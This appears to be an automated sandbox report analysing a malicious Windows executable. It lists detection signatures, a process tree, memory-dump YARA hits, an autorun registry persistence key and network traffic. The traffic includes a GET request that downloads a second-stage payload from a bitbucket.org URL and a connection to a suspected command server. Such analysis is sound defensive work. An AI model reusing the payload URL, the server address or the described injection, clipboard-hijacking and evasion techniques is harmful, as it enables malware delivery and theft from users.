Edit tour

Windows Analysis Report
hoTwj68T1D.exe

Overview

General Information

Sample name:	hoTwj68T1D.exe renamed because original name is a hash value
Original sample name:	50844588480285cb5d541f6c8d80f70bb68195849f4740ee2160ecc562d38044.exe
Analysis ID:	1573904
MD5:	045decc006fc4af07f572acc9211ef53
SHA1:	2a550781d034e9b0c537cea517665b60db681e0a
SHA256:	50844588480285cb5d541f6c8d80f70bb68195849f4740ee2160ecc562d38044
Tags:	181-131-217-244exeuser-JAMESWT_MHT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Multi AV Scanner detection for submitted file

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

Drops PE files to the document folder of the user

Drops large PE files

Injects a PE file into a foreign processes

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

hoTwj68T1D.exe (PID: 6460 cmdline: "C:\Users\user\Desktop\hoTwj68T1D.exe" MD5: 045DECC006FC4AF07F572ACC9211EF53)

csc.exe (PID: 6536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.4659180152.0000000008582000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.4660531571.0000000009C20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.4658171446.00000000073E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: csc.exe PID: 6536	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.csc.exe.8606ec0.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.csc.exe.9c20000.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Documents\PerfectBlues\Bin\PerfectBlues.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\hoTwj68T1D.exe, ProcessId: 6460, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PerfectBlues

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: hoTwj68T1D.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

Unpacked PE file: 1.2.hoTwj68T1D.exe.2240000.2.unpack

Source: hoTwj68T1D.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.6:49762 version: TLS 1.2

Source:	Binary string: Tsjbteflmax.pdb source: csc.exe, csc.exe, 00000003.00000002.4659942113.0000000009AC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.000000000867D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.4658171446.000000000764B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4661171368.000000000A630000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.4658171446.000000000764B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4661171368.000000000A630000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004063C8 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	1_2_004063C8
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004064A4 FindFirstFileA,GetLastError,	1_2_004064A4
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00404F2A FindFirstFileA,	1_2_00404F2A

Source: global traffic

TCP traffic: 192.168.2.6:49752 -> 181.131.217.244:30203

Source: global traffic

HTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 181.131.217.244 181.131.217.244
Source: Joe Sandbox View	IP Address: 185.166.143.49 185.166.143.49

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: navegacionseguracol24vip.org
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org

Source: csc.exe, 00000003.00000002.4658171446.00000000076DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bitbucket.org
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: csc.exe, 00000003.00000002.4660910077.0000000009F30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: csc.exe, 00000003.00000002.4658171446.0000000007706000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000073E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: csc.exe, 00000003.00000002.4658171446.00000000076F8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-
Source: csc.exe, 00000003.00000002.4658171446.00000000076CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: csc.exe, 00000003.00000002.4658171446.000000000764B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/facturacioncol/fact/downloads/null.exe
Source: csc.exe, 00000003.00000002.4658171446.00000000076F8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: csc.exe, 00000003.00000002.4658171446.00000000076F8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076DC000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: csc.exe, 00000003.00000002.4658171446.00000000076F8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076DC000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.4658171446.00000000076F8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076DC000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: hoTwj68T1D.exe, PerfectBlues.exe.1.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000073E1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: csc.exe, 00000003.00000002.4658171446.00000000076F8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076DC000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443

Source: unknown

HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.6:49762 version: TLS 1.2

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

Code function: 1_2_004310C8 OpenClipboard,

1_2_004310C8

Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00431380 SetClipboardData,SetClipboardData,		1_2_00431380
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00431404 SetClipboardData,SetClipboardData,		1_2_00431404

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

Code function: 1_2_0041F030 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,

1_2_0041F030

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

Code function: 1_2_0043279C GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA,SetKeyboardState,

1_2_0043279C

System Summary

.NET source code contains very large array initializations

Source: 1.2.hoTwj68T1D.exe.4d44be.1.raw.unpack, VirtualSender.cs

Large array initialization: TransmitIntegratedSender: array initializer size 543840

Drops large PE files

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

File dump: PerfectBlues.exe.1.dr 979567343

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00426438 NtdllDefWindowProc_A,	1_2_00426438
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00412B78 NtdllDefWindowProc_A,	1_2_00412B78
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0042EC14 NtdllDefWindowProc_A,	1_2_0042EC14

Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004620F4	1_2_004620F4
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00498170	1_2_00498170
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004663D0	1_2_004663D0
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0048E468	1_2_0048E468
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004587E4	1_2_004587E4
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0044E7A4	1_2_0044E7A4
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0042E99C	1_2_0042E99C
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00450D04	1_2_00450D04
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0045CD14	1_2_0045CD14
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004591D4	1_2_004591D4
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0044B1B0	1_2_0044B1B0
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00445294	1_2_00445294
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0044D328	1_2_0044D328
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0045B504	1_2_0045B504
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00455528	1_2_00455528
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0045FC18	1_2_0045FC18
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0049BCE0	1_2_0049BCE0
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_0046BDCE	1_2_0046BDCE
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00491EDC	1_2_00491EDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_071520F0	3_2_071520F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07157258	3_2_07157258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07157248	3_2_07157248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07151E58	3_2_07151E58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07151E68	3_2_07151E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07154929	3_2_07154929
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_07154960	3_2_07154960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09B903C7	3_2_09B903C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09B91470	3_2_09B91470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09B906FF	3_2_09B906FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09BA236B	3_2_09BA236B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09BA8EB8	3_2_09BA8EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09BA3236	3_2_09BA3236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09BA8528	3_2_09BA8528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09BA8519	3_2_09BA8519
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09BA2D78	3_2_09BA2D78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09BA8FC7	3_2_09BA8FC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09BA8EA9	3_2_09BA8EA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CE0B58	3_2_09CE0B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CE6B70	3_2_09CE6B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CE4A88	3_2_09CE4A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CEA1F0	3_2_09CEA1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CE73B0	3_2_09CE73B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CE24B8	3_2_09CE24B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CE56A0	3_2_09CE56A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CE6B60	3_2_09CE6B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CE4DD0	3_2_09CE4DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CE73A1	3_2_09CE73A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CEA5AC	3_2_09CEA5AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CE7507	3_2_09CE7507
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CE24A8	3_2_09CE24A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09CE779B	3_2_09CE779B

Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: String function: 00427000 appears 64 times
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: String function: 004033D0 appears 64 times
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: String function: 00402B28 appears 38 times

Source: hoTwj68T1D.exe

Static PE information: invalid certificate

Source: hoTwj68T1D.exe	Binary or memory string: OriginalFilename vs hoTwj68T1D.exe
Source: hoTwj68T1D.exe, 00000001.00000002.2409090940.00000000022D6000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEdjcao.exe" vs hoTwj68T1D.exe

Source: hoTwj68T1D.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 1.2.hoTwj68T1D.exe.4d44be.1.raw.unpack, VirtualSender.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.hoTwj68T1D.exe.4d44be.1.raw.unpack, TemplateConverter.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.hoTwj68T1D.exe.4d44be.1.raw.unpack, TemplateConverter.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, t9S849sA4DbtdhgyMHE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, t9S849sA4DbtdhgyMHE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, t9S849sA4DbtdhgyMHE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, t9S849sA4DbtdhgyMHE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.885ef40.7.raw.unpack, t9S849sA4DbtdhgyMHE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.885ef40.7.raw.unpack, t9S849sA4DbtdhgyMHE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.885ef40.7.raw.unpack, t9S849sA4DbtdhgyMHE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.885ef40.7.raw.unpack, t9S849sA4DbtdhgyMHE.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 3.2.csc.exe.a630000.6.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 3.2.csc.exe.a630000.6.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 3.2.csc.exe.a630000.6.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 3.2.csc.exe.a630000.6.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 3.2.csc.exe.a630000.6.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 3.2.csc.exe.a630000.6.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 3.2.csc.exe.a630000.6.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 3.2.csc.exe.a630000.6.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, EaTd9Fb6Mdysqov4nGh.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.csc.exe.a630000.6.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 3.2.csc.exe.a630000.6.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, zEO5VEbFZWNDes2oZSS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, YT5sTjWje3EeKLxM3V.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.csc.exe.9ac0000.3.raw.unpack, YT5sTjWje3EeKLxM3V.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

